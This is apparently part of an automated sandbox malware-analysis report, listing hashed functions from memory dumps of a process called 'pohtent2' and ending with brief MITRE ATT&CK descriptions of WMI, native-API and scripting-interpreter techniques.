Instruction Fuzzy Hash: B2E01274D06208EFD784DFB8D9866DDBBF8AB09211F1060A9D84893240EB705A41DB81

Function 061B7390 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction ID: c8fbca67d02931af7b690366f94b430ab668c2ee20945d9ae740a0073b19b3a9
Opcode Fuzzy Hash: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction Fuzzy Hash: EBE01234D09108DBC748EF94E9465ACBBB5FBC5314F20A19DDC4817395DB325E42DB81

Function 061B17A8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction ID: dc56a3297c508941680d3c462d34bbc7ca0487e41522b0654aa18c94175b3532
Opcode Fuzzy Hash: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction Fuzzy Hash: 18E01D34A05108EBC744DF94E5555ACBBB5FB45314F10959DD80417341DB725E41DB81

Function 061B0FE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction ID: c20d363d3abe5ff97785ff3a4815d945d3e8a25093750929f2c5c8450197a40f
Opcode Fuzzy Hash: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction Fuzzy Hash: 0BE0C234A0A108DFC748EF98E9415ADBBB5FB89311F10A0DCD80817340CB325E42DBC4

Function 061B8420 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction ID: 8700201bd8c0cf255c1bd5fd6058216349cf5c09e08743b89ebe28ea564cb5b2
Opcode Fuzzy Hash: c6b60a0c136d05d81bc387356d84d2bfd4da2e9b80def02690436e8bd240e977
Instruction Fuzzy Hash: 87E01274909108DBC788DF94E9856ACBBBDFB86314F50A1A9D84817341CB325E46DB81

Function 05F8FF18 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fba5fce9a13d27b5521fa0116a9216c60f39522653a2df060e80876d143a390
Instruction ID: e3815f82f882ff66b1361b5b6a1057b07bf38a0c51175e9df4b28cc2d20d2a41
Opcode Fuzzy Hash: 0fba5fce9a13d27b5521fa0116a9216c60f39522653a2df060e80876d143a390
Instruction Fuzzy Hash: 9AE0C234D0A148DFC784EBA8D5412BCBFB8FB46310F1081D9D8485B381DA3A9E02DB50

Function 05F55397 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3589f18cbefcb7319ed48740eb3ec1b8aaa4b3ba18ac8ead6dc77b6dbde937
Instruction ID: 2772475173e3480163abf147db323ecc1d48282750fc1822936224bb5f18b645
Opcode Fuzzy Hash: 9b3589f18cbefcb7319ed48740eb3ec1b8aaa4b3ba18ac8ead6dc77b6dbde937
Instruction Fuzzy Hash: 43D05B7178430097DB2059A07E45B7133636F00A75FA40495DF1D5F2D0E9F6E841C711

Function 05F5EF1B Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af21eb09ad2a03ecd781008e8ba812b899d71d7a24392162e6549baaa9c89a0
Instruction ID: 84f7a65d5de867fb9f3e87cee1c9917d75d1d97b1333f67be7548e5fb70974e8
Opcode Fuzzy Hash: 2af21eb09ad2a03ecd781008e8ba812b899d71d7a24392162e6549baaa9c89a0
Instruction Fuzzy Hash: DED01236505A008FE328DF16E111792B7E6AFD4611B49C9BDA55A87644CF75E806CA40

Function 05F50B98 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8510681f43ba1c00704b2570c807c5a951b5afc9665ec9fb4a2ecb9eedf24c
Instruction ID: 2611f2fbdf2609daf4994a84ae26bb98304bcc36800a97f50cee347d2ed0e6c1
Opcode Fuzzy Hash: 5a8510681f43ba1c00704b2570c807c5a951b5afc9665ec9fb4a2ecb9eedf24c
Instruction Fuzzy Hash: B3E01D70E5120DEFD701DFB4ED5179DB7F9DB85204F508555D8049B344DA715E0057D0

Function 061B1E88 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4fd6c40481803f18b6cd584c0e79a87a49a75e7130d7729c504eebd2fa0ffb1
Instruction ID: d05af83dadb85fa1a5cbf858ac64a1ed78466ad3814b491face82e33a612981a
Opcode Fuzzy Hash: e4fd6c40481803f18b6cd584c0e79a87a49a75e7130d7729c504eebd2fa0ffb1
Instruction Fuzzy Hash: 17E0C234D05108EFC794DBE9D5522BCBFB5EB45210F1090E9D8485B341DB369E01DB80

Function 061B738F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7968f34391466c91d21b9b9b3088cf7db8e83c7e9fb139724661b6e15ae47c
Instruction ID: e1b4577403d559ea7c4adf19e0ded8b2d5a6384f103f2f1543469340635a1dfe
Opcode Fuzzy Hash: 4a7968f34391466c91d21b9b9b3088cf7db8e83c7e9fb139724661b6e15ae47c
Instruction Fuzzy Hash: 54D01234A59005DBC758D694D6425AC7771EB86214F24A588DC584B396CA375D03D740

Function 061B17A7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7968f34391466c91d21b9b9b3088cf7db8e83c7e9fb139724661b6e15ae47c
Instruction ID: 71089ee34459cf95c46452da428eb499ed8e0a1dedfced81d1a4b4609b206df6
Opcode Fuzzy Hash: 4a7968f34391466c91d21b9b9b3088cf7db8e83c7e9fb139724661b6e15ae47c
Instruction Fuzzy Hash: 49D05B38749005EBC758DB94D6525A877B5EB46714F14A5DCDC0C4B352CB775D03C740

Function 061B54F6 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44c170588749e913b915d47a695af9d8b4298cf43ecadcaa2c834afb04d7ab8
Instruction ID: 5ded8776741d643558a79e954e8fde8a05fe19699fe562a5044ebccba6ae3fd5
Opcode Fuzzy Hash: c44c170588749e913b915d47a695af9d8b4298cf43ecadcaa2c834afb04d7ab8
Instruction Fuzzy Hash: EFE01A74908118DFDB62DF14C810BDABBB2BB0D300F0141C9D58AA7389CB355E408F51

Function 05F87DC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e7f6c6ccfe88f883c2dd14f8b5920a9e8d2c68828380ce812a98237a573a4a
Instruction ID: 36648af5fc203379d6c40a95617b124e89b14225079baa68c09a590f7979461f
Opcode Fuzzy Hash: e9e7f6c6ccfe88f883c2dd14f8b5920a9e8d2c68828380ce812a98237a573a4a
Instruction Fuzzy Hash: 05D05E3550F108EBC744EA94E941A78BBADEB46324F20909C980957345CA379E01D740

Function 05F50748 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eee56a4280583f6d7065d13dbc135b26c30a043ccd727d7398833e8ec099013
Instruction ID: 933c095317c3ef035461036be1c144c8810eb520d5c316d15a0c6591321779eb
Opcode Fuzzy Hash: 8eee56a4280583f6d7065d13dbc135b26c30a043ccd727d7398833e8ec099013
Instruction Fuzzy Hash: C4E01271A01109EFDB00EFA8E54169DBBFAEB85204F5045A8D80DD7345EA715E009B91

Function 061B071F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d5755f35a26039b53885191026ce25a5eace6f518b3b5c6f70b43cd9ba53548
Instruction ID: 058eb92ade8ec5840a9ae71bfdc7e0bc2b259d46208e389296e5e250b478ea1d
Opcode Fuzzy Hash: 9d5755f35a26039b53885191026ce25a5eace6f518b3b5c6f70b43cd9ba53548
Instruction Fuzzy Hash: 9AD02B30949245CEC7E4C7A8D5866EDBFF0AB06231F1022C9C8D85B292C7750643C782

Function 061B7FC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9529160fb890a6e0d4bb80d47a9e48218ebc533ea5a072d5008e975d78efba4
Instruction ID: 60cb70f7e9db5c4cb0ccdbfe0c03afe3511cf3cab71fff854c5a1c07df7071aa
Opcode Fuzzy Hash: a9529160fb890a6e0d4bb80d47a9e48218ebc533ea5a072d5008e975d78efba4
Instruction Fuzzy Hash: 81D0A73450A108DFC788CB98E941AF8B7BCEB86324F10A09CE82867381CF339E01D785

Function 061B2148 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9529160fb890a6e0d4bb80d47a9e48218ebc533ea5a072d5008e975d78efba4
Instruction ID: eeeaf7a0b76434f725131fb014ebabdad465ec5ca15852412b06d573dc77f2b0
Opcode Fuzzy Hash: a9529160fb890a6e0d4bb80d47a9e48218ebc533ea5a072d5008e975d78efba4
Instruction Fuzzy Hash: 56D05E3450A108DBC798CA94E941AB9B7BCEB46314F18A098E80847341CB339E02D780

Function 05F5E260 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8176c275fd796fb40126109fff3556b0f88c915485e14e0e8d70837ccb37b13f
Instruction ID: 78823f6c1f8f8e9a594b96affa10e5a9d7f9d9683882cd9c6d7396fbfabe21c3
Opcode Fuzzy Hash: 8176c275fd796fb40126109fff3556b0f88c915485e14e0e8d70837ccb37b13f
Instruction Fuzzy Hash: 84D0A73B0082C0CFC3028B20D4008503F789F2B23230540E6EA548F333C5218E15C750

Function 061B4B0C Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1317058a280d3f3adf560ce3fdbfbffbeed3553dca59693d2808117846352428
Instruction ID: ce47fc920d6ddf26b452bd7a65554229d263b5fadc7195537e504b5f1374e780
Opcode Fuzzy Hash: 1317058a280d3f3adf560ce3fdbfbffbeed3553dca59693d2808117846352428
Instruction Fuzzy Hash: CCE046349001288FCB90EF64E8087ADB6F2FB49300F009099C04AAB348C7301D808F40

Function 061B7FBF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4482d8deddbe83f466b0b8b654b67e5235f98fea5fce2096dedb860df06ad980
Instruction ID: 220456932658c8665da56f094ad2ac3c3ddfce68050cba2463c3499f5e003467
Opcode Fuzzy Hash: 4482d8deddbe83f466b0b8b654b67e5235f98fea5fce2096dedb860df06ad980
Instruction Fuzzy Hash: FAD05E34906004CBC788CA94E6416B8B364EB82214F14A48DD8282B380CF328E01D740

Function 05F8C555 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a555fc76638afc1338294002756d11f5c91d0d1c372fdba9fbe02330e15e06
Instruction ID: 82e9af5057922b88fee7417aff4a4299d22b695ce51652ea368b4578f88c8c07
Opcode Fuzzy Hash: e1a555fc76638afc1338294002756d11f5c91d0d1c372fdba9fbe02330e15e06
Instruction Fuzzy Hash: 4EE0B678E04229CFCB24EF64D8447ADBBB1FB49300F104169D909AB348EB386D85CF01

Function 05F8B910 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3868fdde87ab20cb90e0106293f271de3f7a95a6ab3a5919858b3523b8d2aea4
Instruction ID: a960ad37793413e40acc3895227c54a9c162ae222e37b11fdfff2611e5f7ac4c
Opcode Fuzzy Hash: 3868fdde87ab20cb90e0106293f271de3f7a95a6ab3a5919858b3523b8d2aea4
Instruction Fuzzy Hash: 16E01279A042188FEB40EF64C8457EE7BB2EF4D310F4190559005E7348CE355980CF11

Function 05F80328 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d894ec16f08ab27af9d68861dec83c2489f3c1d4c7bc951392e1f972958dea
Instruction ID: b63343391fa4ba3fa8d6a30832eca74989033ad126f2d0b868289e85e0df8a06
Opcode Fuzzy Hash: e1d894ec16f08ab27af9d68861dec83c2489f3c1d4c7bc951392e1f972958dea
Instruction Fuzzy Hash: 95D01277040128AFC740DBE8D881FC3F768EF18614F554192F944D7321D221DC1085F0

Function 061B3602 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f8f75065f95d223035f6bda983e9d97803ebecf1f0eed6d62e98f9e457d9335
Instruction ID: 7fe6cc3a34f6ff52c983f6dba7106380ded5908a223d9ec47e8fc58a65305b60
Opcode Fuzzy Hash: 3f8f75065f95d223035f6bda983e9d97803ebecf1f0eed6d62e98f9e457d9335
Instruction Fuzzy Hash: 69E01735900108AFDF06EFD4C8449DDBB72FB89301F018100E60A6F358CB7599549B90

Function 05F82518 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e4474a5e09cbd9ff30c528a9b3f36408a2b4d45f70409b046ca2c6cc893fe9e
Instruction ID: fb93fe3e6ddd483082e06f8cc40c212627d03a39e736965787b04a1fce4992b1
Opcode Fuzzy Hash: 3e4474a5e09cbd9ff30c528a9b3f36408a2b4d45f70409b046ca2c6cc893fe9e
Instruction Fuzzy Hash: 68C08CB3040208BBC3048A50EE43B8A7B68E724B00F248464F58541285D733E61786DA

Function 05F5EF27 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e30dbbc58eefbb2db4e78ab8625790e06ff1eb5dddd90dff71780da360d17bd
Instruction ID: 91aba139165c407396c69857ded8f3b542c35e3272feeb873896ed2818ec5b8c
Opcode Fuzzy Hash: 6e30dbbc58eefbb2db4e78ab8625790e06ff1eb5dddd90dff71780da360d17bd
Instruction Fuzzy Hash: E4D0C975844A008BD724DF66A505186BBE3EFC9755348C869E15E46615DA74D4028E80

Function 0617E728 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2837101188.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6160000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59439bd55304a0bceb3e6e54bc4e97e96fcaa1afc5ad27315644ab4f075e4b76
Instruction ID: 323eb15ffa69adab08e4eed7d2f7424392f52715877a0bf641f83f19a8bac267
Opcode Fuzzy Hash: 59439bd55304a0bceb3e6e54bc4e97e96fcaa1afc5ad27315644ab4f075e4b76
Instruction Fuzzy Hash: 64C08C3008B2048AC2D81688740E3707AECA306311F002840E00E00012CB644040C2D0

Function 05F83230 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c57b6a6abda9b9775f8ecef4f35b3e941610c1a6173eb266e6689bead563e33
Instruction ID: 8e1aeeebbda99cc083e8e716da857ce05fc712ef9ee81cb920e14e4fa110806e
Opcode Fuzzy Hash: 6c57b6a6abda9b9775f8ecef4f35b3e941610c1a6173eb266e6689bead563e33
Instruction Fuzzy Hash: 5BC01277100020ABC224CA04DCA2B96B361EF84618F2CC859AC899B351DA33EC03DB84

Function 05E3119E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2799012162.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e30000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb1a004533f9f164e7e9521add630a929ee8843f8f96799714be9fce51d178d
Instruction ID: 868ced603dca0c1d45627e7f2b780514b91e17ed7435585f29a1c5305154cb2f
Opcode Fuzzy Hash: 0bb1a004533f9f164e7e9521add630a929ee8843f8f96799714be9fce51d178d
Instruction Fuzzy Hash: 50D06C749403299BCBA4EF10C889AEDBBB1AB49740F5051EA8018B7300D6705E80CF54

Function 05E37472 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2799012162.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e30000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069a328cbe6e3bce48b604f694683e451f62e1334627f3a2513a4feee3c8d2fc
Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
Opcode Fuzzy Hash: 069a328cbe6e3bce48b604f694683e451f62e1334627f3a2513a4feee3c8d2fc
Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50

Function 05F5BDA0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f74d3d932a3df73c973c35f958f6411d50e08fa82320953689e469ab146a6c
Instruction ID: f56d5aea86c3b6df51416f50afe3503efff5c3ecfae77e173c26d55fd5bb1060
Opcode Fuzzy Hash: 87f74d3d932a3df73c973c35f958f6411d50e08fa82320953689e469ab146a6c
Instruction Fuzzy Hash: C8B092AB90D2C09EEB5B23308D6A4C83F758997020B9998C38984C5062A59F080EC6A2

Function 05E3693E Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2799012162.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e30000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ca99df28b2d5b446049c42e3e68ba68b14189cf4076dd3f79cd715908d9b42
Instruction ID: e2cca212ab4d48e3e1bc3c551427351af6a2d8160d658fd62e8873346f781222
Opcode Fuzzy Hash: 37ca99df28b2d5b446049c42e3e68ba68b14189cf4076dd3f79cd715908d9b42
Instruction Fuzzy Hash: 10D0EA74D16228DFEB64CF65DC59B9DBBB1BB09301F0061D9E44AA3250DB301A80CF05

Function 05F5E270 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 05F82528 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed25edb4527d2a71f9e1cfce0154723ca085bb40d36ed6eec28e371d5664d79
Instruction ID: 0bbb1aac9c8d8b667b41a6438dfcb49bdc2cc363012a3ac28dbf554253566a5d
Opcode Fuzzy Hash: 1ed25edb4527d2a71f9e1cfce0154723ca085bb40d36ed6eec28e371d5664d79
Instruction Fuzzy Hash: B5B0123200030CEBC7109F84ED05C56BF6DEB58700720C025F60906119CB33F822DBD4

Function 05F54F0B Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dce024c5ccc451b8b9f459f6f7675fedf53099c8d4fbfa09195cc447bef260e
Instruction ID: 426ca8b8790fcd24ad4fcad6192644befd3de1956beaf02b0871e79d178b92d9
Opcode Fuzzy Hash: 1dce024c5ccc451b8b9f459f6f7675fedf53099c8d4fbfa09195cc447bef260e
Instruction Fuzzy Hash: 45B012B3914060DEA6019780CA0B6097921DBA0301F008424700481114CBB28C50D770

Function 05F5200F Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9354aad165be0e82c09654329e8b3dd904a0820fb079b0a6b8151465d236cd0
Instruction ID: 6bae4914577385edeec90897453008bc8b83bb5d354d6ced7e4591086e7e87da
Opcode Fuzzy Hash: e9354aad165be0e82c09654329e8b3dd904a0820fb079b0a6b8151465d236cd0
Instruction Fuzzy Hash:

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

